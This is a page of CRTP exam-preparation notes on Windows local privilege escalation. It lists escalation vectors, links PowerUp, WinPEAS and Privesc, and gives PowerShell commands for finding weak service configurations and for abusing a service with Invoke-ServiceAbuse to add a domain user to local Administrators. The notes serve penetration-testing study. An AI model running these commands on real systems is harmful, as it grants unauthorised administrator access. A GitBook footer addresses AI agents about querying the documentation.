> For the complete documentation index, see [llms.txt](https://dudisamarel.gitbook.io/crtp-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dudisamarel.gitbook.io/crtp-notes/privilege-escalation/local-privilege-escalation.md).

# Local Privilege Escalation

{% hint style="info" %}
The CRTP exam consists of 5 target servers in addition to a foothold student machine.\
The goal is to OS level command execution on all 5 targets not matter what the privileges of the user.
{% endhint %}

####

## Vectors

#### There are various ways of locally escalating privileges on Windows box:&#x20;

* Missing patches – Automated deployment and AutoLogon passwords in clear text&#x20;
* &#x20;AlwaysInstallElevated (Any user can run MSI as SYSTEM)&#x20;
* &#x20;Misconfigured Services – DLL Hijacking and more&#x20;
* NTLM Relaying a.k.a. Won't Fix

This guide offer a sufficiently comprehensive overview of the course material for local privilege escalation

{% embed url="<https://github.com/0xStarlight/CRTP-Notes/blob/main/2-Local-Priv-Esc/1-Local-PrivEsc.md>" %}

## Tools

### PowerUp

{% embed url="<https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1>" %}

### WinPEAS

{% embed url="<https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS>" %}

### Privesc

{% embed url="<https://github.com/enjoiz/Privesc>" %}

### Automated checks

```powershell
# PowerUp
Invoke-AllChecks

# winPEAS
winPEASx64.exe 

# Privesc
Invoke-PrivEsc
```

## Services

{% tabs %}
{% tab title="PowerUp" %}
Find vulnerable service configuration

```powershell
# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose

# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify
Get-ModifiableService -Verbose
```

Add domain user to the local Administrators group

```powershell
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose  
```

{% endtab %}
{% endtabs %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dudisamarel.gitbook.io/crtp-notes/privilege-escalation/local-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.